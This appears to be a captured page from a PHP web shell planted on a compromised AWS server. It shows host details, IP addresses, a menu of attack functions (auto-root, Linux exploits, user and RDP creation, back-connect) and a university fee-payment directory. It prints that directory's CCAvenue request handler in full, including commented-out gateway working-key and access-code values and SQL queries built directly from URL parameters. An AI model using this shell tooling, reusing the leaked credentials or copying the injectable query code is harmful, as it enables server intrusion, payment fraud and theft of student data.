Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.83.62
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
nehu /
hdfc /
[ HOME SHELL ]
Name
Size
Permission
Action
Crypto.php
1.99
KB
-rwxr-xr-x
HDFCAPI.php
2.42
KB
-rw-r--r--
Status_API_NEW.php
16.35
KB
-rw-r--r--
ccavRequestHandler.php
6.35
KB
-rwxr-xr-x
ccavRequestHandler.php~
978
B
-rwxr-xr-x
ccavRequestHandler_bf_exam_200...
3.51
KB
-rwxr-xr-x
ccavResponseHandler.php
19.83
KB
-rwxr-xr-x
ccavResponseHandler.php~
1.41
KB
-rwxr-xr-x
ccavResponseHandler_bf_exam_20...
9.82
KB
-rwxr-xr-x
ccavResponseHandler_new.php
1.46
KB
-rwxr-xr-x
ccavStatusAPI.php
221
B
-rw-r--r--
dataFrom.htm
19.25
KB
-rwxr-xr-x
dataFrom.htm~
19.01
KB
-rwxr-xr-x
exam_hdfc_order_api.php
22.84
KB
-rwxr-xr-x
exam_hdfc_order_api2.php
12.95
KB
-rw-r--r--
from.html
644
B
-rwxr-xr-x
hdfc_order_api.php
2.77
KB
-rwxr-xr-x
hdfc_req.php
3.38
KB
-rwxr-xr-x
jquery-1.7.2.min.js
92.62
KB
-rwxr-xr-x
json.js
3.27
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccavRequestHandler.php
<html> <head> <title> Custom Form Kit </title> </head> <body> <center> <?php include('Crypto.php')?> <?php include("/var/www/config.php"); error_reporting(0); $merchant_data=''; //$working_key='4C951A28AAA39C9F123E3897FC1C699E';//Shared by CCAVENUES //$access_code='AVHI84GC05BH58IHHB';//Shared by CCAVENUES $appno = $_GET['productinfo']; $type = $_GET['type']; $funivcode = "005"; $bank = 'hdfc'; $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = "logisys3_nehu"; $conn = new mysqli($servername, $username, $password, $dbname); //IFNULL(cs.ftotalfee,0) $get_data = "select * from masbank where fenttype = 'adm' and fbank = '{$bank}'"; $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { // var_dump($row); $working_key = $row['fmid']; $access_code = $row['fkey']; $website = $row['fwebsite']; $returnurl = $row['freturnurl']; } } if($type == 'exam') { $get_data = "select cs.fregno, cs.fdegree, cs.fcollcode, cs.fyear, cs.fexamtype, IFNULL(cs.ftotalfee,0) as ftotalfee, s.fname,control.funivname,pdf_logo_path, IFNULL(s.FCONTACT_NO,'9999999999') as fmobileno,IFNULL(s.femail,'') as femail, cs.fyear,cs.fexamtype from control, appcandsum cs inner join student s on cs.fregno = s.fregno where appno = '{$appno}'"; $pname = "Exam Form"; }else if($type == 'ppcfee') { $get_data = "select cs.fappno as fregno, s.fdegree, s.fcollcode, IFNULL(cs.fremamount,0) as ftotalfee, s.fname,control.funivname,pdf_logo_path, IFNULL(s.FCONTACT_NO,'9999999999') as fmobileno,IFNULL(s.femail,'') as femail, YEAR(now()) as fyear, '1' as fexamtype, from control, studmiscfee cs inner join student s on cs.fregno = s.fregno where cs.fregno = '{$appno}'"; $pname = "PPC Exam Form"; } else if($type == 'res') { $get_data = "select cs.fregno as fregno, IFNULL(cs.FTOTAL,0) as ftotalfee, control.funivname,pdf_logo_path, '999999999' as fmobileno, '99999' as fname,'999999@gmail.com' as femail,cs.fcollcode,cs.fdegree, cs.fyear,cs.fexamtype from control, res_stud cs where appno = '{$appno}'"; $pname = "Re-evaluation"; }else if($type == 'convo') { $get_data = "select cs.fregno, s.fdegree, s.fcollcode, YEAR(now()) as fyear, '1' as fexamtype, IFNULL(cs.FAMOUNT,0) as ftotalfee, s.fname,control.funivname,pdf_logo_path, IFNULL(cs.FMOBILE,'') as fmobileno,IFNULL(cs.FEMAIL,'') as femail from control, dctran cs inner join dcstud s on cs.fregno = s.fregno where cs.fappno = '{$appno}'"; $pname = "Convocation"; } else { $get_data = "select cs.FROLLNO as fregno, IFNULL(cs.famount,0) as ftotalfee, control.funivname,pdf_logo_path, FCONTACT_NO as fmobileno, fname as fname,cs.femail as femail,cs.fcollcode,cs.fdegree, YEAR(now()) as fyear, '1' as fexamtype from control, studadm cs inner join college c on cs.fcollcode = c.fcollcode where fappno = '{$appno}'"; $pname = "Registration"; $type = 'ADM'; } //var_dump($get_data); $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { // var_dump($row); $fregno = $row['fregno']; $ftotalfee = $row['ftotalfee']; $fname = $row['fname']; $fcollcode = $row['fcollcode']; $fdegree = $row['fdegree']; $fmobileno = $row['fmobileno']; $femail = $row['femail']; $funivname = $row['funivname']; $logo = $row['pdf_logo_path']; $fyear = $row['fyear']; $fexamtype = $row['fexamtype']; } } $_POST['merchant_id'] = $website; //$number = rand(10000000,99999999); $number = (int)date("Ymdhis").rand(10000000,99999999); $orderid = "HDFC".$number; $_POST['order_id'] = $orderid; $_POST['currency'] = 'INR'; $_POST['amount'] = $ftotalfee; if($type == 'exam') { $query = "update appcandsum set forderid = '{$orderid}', FPAYGATEWAY = '{$bank}' where appno = '{$appno}'"; } else if($type == 'ppcfee') { $query = "update studmiscfee set forderid = '{$orderid}', fpaymentype = '{$bank}' where fregno = '{$appno}'"; }else if($type == 'res') { $query = "update res_stud set forderid = '{$orderid}', fpaymentype = '{$bank}' where appno = '{$appno}'"; } else { $query = "update studadm set forderid = '{$orderid}', fpaymentype = '{$bank}' where fappno = '{$appno}'"; } $res_update = $conn->query($query); $query = "insert into pgdet(ftype, appno, fappdate, fpaygateway, fregno, fdegree, fcollcode, famount, forderid, fyear, fexamtype, fcreatedate) values('{$type}', '{$appno}', current_date(), 'HDFC', '{$fregno}', '{$fdegree}', '{$fcollcode}', '{$ftotalfee}', '{$orderid}', '{$fyear}', '{$fexamtype}', now())"; $res_update1 = $conn->query($query); $protocol = stripos($_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://'; $protocol = "https://"; $url = $protocol.$returnurl; //$_POST['redirect_url'] = $url; //$_POST['cancel_url'] = $url; $_POST['language'] = 'EN'; $_POST['billing_name'] = "Sikkim University"; $_POST['billing_tel'] = $fmobileno; $_POST['billing_email'] = "abcd@gmail.com"; // merchant_param1 if($type == 'ppcfee') { $_POST['merchant_param2'] = $appno; $_POST['merchant_param3'] = $fregno; }else { $_POST['merchant_param2'] = $fregno; $_POST['merchant_param3'] = $appno; } $_POST['merchant_param1'] = $funivcode; $_POST['merchant_param4'] = $pname; //var_dump($working_key); // var_dump($_POST); // die(); foreach($_POST as $key => $value){ $merchant_data .= $key.'='.urlencode($value).'&'; } $merchant_data .= "&redirect_url=".$url."&cancel_url=".$url; // var_dump($merchant_data); // die(); $encrypted_data=encrypt($merchant_data,$working_key); // Method for encrypting the data. //var_dump($encrypted_data); //die(); //https://test.ccavenue.com/transaction/transaction.do?command=initiateTransaction //https://secure.ccavenue.com/transaction/transaction.do?command=initiateTransaction ?> <form method="post" name="redirect" action="https://secure.ccavenue.com/transaction/transaction.do?command=initiateTransaction"> <?php echo "<input type=hidden name=encRequest value=$encrypted_data>"; echo "<input type=hidden name=access_code value=$access_code>"; ?> </form> </center> <script language='javascript'>document.redirect.submit();</script> </body> </html>
Close
